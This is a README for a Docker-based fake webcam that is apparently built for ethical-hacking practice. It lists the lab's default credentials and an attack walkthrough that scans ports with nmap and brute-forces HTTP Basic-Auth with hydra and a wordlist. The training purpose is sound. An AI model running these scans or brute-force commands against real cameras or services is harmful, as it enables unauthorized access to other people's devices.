29015050e8e66b3be8599e2d86a78196d98c9469
Fake cam
Fake cam is a simple docker container running a fake webcam. It is used for educational purposes to teach ethical hacking.
Default creds are : admin | cam123
Requirements
- Docker
Install
- Pull the repository
git clone https://git.phorge.fr/l-nmch/fake-cam.git
- Build the image
docker compose build
Deploy
- Run the container
docker compose up -d
- Verify cam access
curl -u admin:cam123 http://<ip>:3301
Attack
- Install required tools
apt install hydra curl nmap zip unzip -y
- Download the wordlist
wget https://git.phorge.fr/l-nmch/fake-cam/raw/branch/master/wordlist.txt
unzip rockyou.txt.zip
- Find open ports:
nmap -sC -sV <ip>
- Bruteforce Basic-Auth
hydra -l admin -P wordlist.txt -s 3301 <ip> http-get /
Description
Languages
HTML
86.2%
Shell
8.2%
Dockerfile
5.6%